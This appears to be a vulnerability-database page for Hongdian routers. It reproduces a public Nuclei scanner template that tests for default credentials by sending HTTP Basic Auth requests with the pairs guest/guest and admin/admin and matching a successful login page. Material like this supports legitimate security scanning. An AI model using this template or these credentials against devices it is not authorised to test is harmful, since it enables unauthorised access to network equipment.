漏洞描述
Hongdian default login information was detected.
hongdian-default-login: Hongdian Default Login
PoC代码[已公开]
id: hongdian-default-login
info:
name: Hongdian Default Login
author: gy741
severity: high
description: Hongdian default login information was detected.
reference:
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 4
tags: hongdian,default-login,vuln
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
- |
GET / HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
payloads:
username:
- guest
- admin
password:
- guest
- admin
attack: pitchfork
matchers-condition: and
matchers:
- type: word
words:
- "text/html"
part: header
- type: word
words:
- "status_main.cgi"
part: body
- type: status
status:
- 200
# digest: 4a0a0047304502207b89c3fed4d369a84ccdea16d59c4a01edbd19403e72b391c3d062a4889c4246022100ad3a23231b495ca61e44d8725a6916a180bf730e5304fd6984be37676043d7f5:922c64590222798bb761d5b6d8e72950